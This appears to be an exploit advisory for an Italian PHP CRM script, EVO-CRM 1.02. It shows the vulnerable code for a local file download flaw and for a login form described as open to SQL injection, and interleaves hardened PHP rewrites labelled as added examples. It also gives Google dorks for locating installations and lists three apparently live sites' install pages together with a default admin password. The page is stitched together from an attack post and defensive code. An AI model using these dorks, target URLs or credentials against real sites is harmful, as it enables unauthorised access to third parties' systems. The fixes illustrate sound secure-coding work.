/***********************************************************************************
** Exploit Title: EVO-CRM Script Multi Vulnerability
**
** Exploit Author: Milad Hacking
**
** Vendor Homepage : http://www.operagrafica.it/
**
** Version: 1.02
**
** Google Dork 1 : intext:"Sito web realizzato da OperaGrafica"
**
** Google Dork 2 : inurl:"contatti.htm" intext:"Dopo aver preso visione"
**
** Date: 2020-03-13
**
** Tested on: Windows / Mozilla Firefox
**
***********************************************************************************
** Demo Vulnerability LFD (Local File Download, download.php with parameter nome_file) :
***********************************************************************************
** Vulnerable Code, Local File Download (download.php) :
<?php
$nome_file = $_GET['nome_file'];
$dimensione_file = filesize($nome_file);
header("Content-type: Application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($nome_file));
header("Content-Description: Download PHP");
header("Content-Length: $dimensione_file");
readfile($nome_file);
?>
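The listing above passes `nome_file` straight to `readfile()`, so any file the web server can read, including the script's own source, is returned. A hardened handler, as an added example that is not the vendor's code (the `DOWNLOAD_DIR` path and the extension allowlist are assumptions):

```php
<?php
// Added example, not vendor code. DOWNLOAD_DIR is an assumed directory that
// holds only files meant to be public; the extension list is also assumed.
const DOWNLOAD_DIR = '/var/www/evo-crm-downloads';

/**
 * Map a user-supplied nome_file value to a real path inside $baseDir.
 * Returns null when the request must be refused.
 */
function resolve_download(string $baseDir, $requested): ?string
{
    // Array-valued parameters (nome_file[]=x) are refused outright.
    if (!is_string($requested)) {
        return null;
    }
    // Bare file name only: no separators, no leading dot, no NUL byte, and an
    // allowlisted extension, so download.php and config files never match.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]*\.(pdf|zip|jpg|png)\z/i', $requested)) {
        return null;
    }
    // realpath() resolves symlinks; the result must still sit under the base.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Request handling is skipped on the CLI so the function can be tested alone.
if (PHP_SAPI !== 'cli') {
    $raw  = $_GET['nome_file'] ?? null;
    $path = resolve_download(DOWNLOAD_DIR, $raw);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    // $raw passed the allowlist pattern, so it is safe inside the header value.
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $raw . '"');
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```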
***********************************************************************************
** Demo Vulnerability Login Page Bypass via SQL Injection in POST Parameters (riservato/index.php) :
***********************************************************************************
** Vulnerable Code, SQL Injection (login form; posts login and password to utente/login.php) :
<?php
define('ACCESS', 'public');
define('RELATIVE_PATH', "../");
require_once(RELATIVE_PATH.'include/application_top.php');
?>
<!DOCTYPE html>
<html lang="en">
<head>
<?php include_once("header_top.php");?>
</head>
<body>
<div id="caricamento" style="height:100%; top:0px;"></div>
<div class="container-fluid">
<div class="row-fluid">
<div class="row-fluid">
<div class="span12 center">
<img src="img/operagrafica.jpg" alt="<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>" />
<h2>Accesso riservato <?=constant(strtoupper("GENERALI_"._NOME_SITO))?></h2>
</div><!--/span-->
</div><!--/row-->
<div class="row-fluid">
<div class="well span5 center login-box">
<div class="alert alert-info">
Inserite un utente con credenziali valide per accedere al pannello di amministrazione.
</div>
<form class="form-horizontal" action="<?=_ABSOLUTE_PATH?><?=_MODULI?>utente/login.php" method="post">
<fieldset>
<div class="input-prepend" title="Inserisci la tua login" data-rel="tooltip_input">
<span class="add-on"><i class="icon-user"></i></span><input autofocus class="input-medium" name="login" id="username" type="text" value="" />
</div>
<div class="clearfix"></div>
<div class="input-prepend" title="Inserisci la tua password" data-rel="tooltip_input">
<span class="add-on"><i class="icon-lock"></i></span><input class="input-medium" name="password" id="password" type="password" value="" />
</div>
<div class="clearfix"></div>
<!-- <div class="input-prepend">
<label class="remember" for="remember"><input type="checkbox" id="remember" />Remember me</label>
</div>
<div class="clearfix"></div> -->
<input name="loginsubmit" type="hidden" value="Invia" />
<p class="center span5">
<button type="submit" class="btn btn-primary">Login</button>
</p>
</fieldset>
</form>
</div><!--/span-->
</div><!--/row-->
<div class="row-fluid">
<div class="well span5 center">
<p>Password dimenticata? </p>
<a style="margin-left:-10px;" href="richiedi_password.php" class="btn"><i class="icon-download"></i> Richiedi nuova password</a>
</div><!--/span-->
</div><!--/row-->
</div><!--/fluid-row-->
<div class="row-fluid">
<div class="span5 center">
<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>
</div><!--/span-->
</div><!--/row-->
</div><!--/.fluid-container-->
<?php include_once("footer_js.php");?>
</body>
</html>
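The listing above is only the login form; the server-side query in `utente/login.php` is not shown on this page. The following added example, which is not the vendor's code, shows a handler for the same `login` and `password` fields that keeps both values out of the SQL text (the `utenti` table, its columns and the in-memory SQLite database are assumptions, and the accounts are constructed sample data):

```php
<?php
// Added example, not vendor code. The utenti table, its columns and the
// SQLite database are assumptions; sample accounts are constructed.

/** Return the user id on success, null on any failure. */
function authenticate(PDO $db, $login, $password): ?int
{
    // Array-valued POST fields (login[]=x) must not reach the query layer.
    if (!is_string($login) || !is_string($password) || $login === '') {
        return null;
    }
    // Bound placeholder: the value travels as data and is never parsed as SQL.
    $stmt = $db->prepare('SELECT id, password_hash FROM utenti WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    // The password is checked in PHP against a stored hash, not inside the query.
    return password_verify($password, $row['password_hash']) ? (int) $row['id'] : null;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE utenti (id INTEGER PRIMARY KEY, login TEXT UNIQUE, password_hash TEXT)');
$add = $db->prepare('INSERT INTO utenti (login, password_hash) VALUES (?, ?)');
$add->execute(['mario', password_hash('sample-pw-1', PASSWORD_DEFAULT)]);
$add->execute(["d'angelo", password_hash('sample-pw-2', PASSWORD_DEFAULT)]);

$checks = [
    'valid login'                 => authenticate($db, 'mario', 'sample-pw-1') === 1,
    'quote in login is just data' => authenticate($db, "d'angelo", 'sample-pw-2') === 2,
    'wrong password refused'      => authenticate($db, 'mario', 'sample-pw-2') === null,
    'unknown user refused'        => authenticate($db, 'nobody', 'sample-pw-1') === null,
    'array input refused'         => authenticate($db, ['mario'], 'sample-pw-1') === null,
];
foreach ($checks as $name => $ok) {
    echo ($ok ? 'ok   ' : 'FAIL ') . $name . PHP_EOL;
}
```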
***********************************************************************************
** Demo Vulnerability Default Password :
http://www.lemstrumenti.it/include/install/index.php
https://www.e-volving.it/include/install/index.php
http://www.autmarconi.it/include/install/index.php
Information : Username: admin Password: nimda
***********************************************************************************
** Special thanks to: Iliya Norton , Vahid Elmi , Mahsa Black , Mahdi c0c01n, Nazila Black-hat , Mahsa Black , MSAmiee , Ahawz Hackerz , AliHack051 , Ahor4
***********************************************************************************
***********************************************************************************